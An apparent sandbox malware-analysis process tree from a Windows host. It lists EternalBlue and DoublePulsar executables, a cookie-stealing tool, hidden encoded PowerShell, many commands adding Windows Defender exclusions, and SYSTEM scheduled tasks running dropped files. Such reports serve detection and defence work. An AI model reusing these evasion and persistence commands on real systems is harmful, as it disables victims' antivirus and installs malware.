C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=754 & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exeC:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=75412⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZeivHZFw" /SC once /ST 10:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZeivHZFw"13⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZeivHZFw"13⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe\" nh /site_id 754 /S" /V1 /F13⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E075E819-137F-4762-8AAE-E4810080741A} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe U4 /S2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
-
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\taskeng.exetaskeng.exe {A1A3734B-8059-4A6F-8531-2F8749D2FA4B} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe nh /site_id 754 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjsdPAFWT" /SC once /ST 09:57:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjsdPAFWT"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjsdPAFWT"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ZKIEJJPSRIlthXTT\dQBOHfmJ\jCxTUEkzMDiPDGlL.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hxLIpSuPLJUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yjiDqdgnMIE" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pJxacTbbSlizmPVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZKIEJJPSRIlthXTT" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 09:55:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe\" V8 /site_id 754 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"3⤵
-
-
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\xrAgvZi.exe V8 /site_id 754 /S2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\XDReZe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\HPKwcBM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\treWaCh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\YwCwLnF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\TYmwRSM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\LIWceyB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 08:28:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll\",#1 /site_id 754" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hMZOFgVuABkGdcuhk"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuuUmySUVfW" /SC once /ST 02:10:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe\" U4 /S"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuuUmySUVfW"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuuUmySUVfW"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuuUmySUVfW"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cbBtQoNpOByPPTwrn"3⤵
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\FPJfKxsR\YXMISVY.dll",#1 /site_id 7542⤵
-
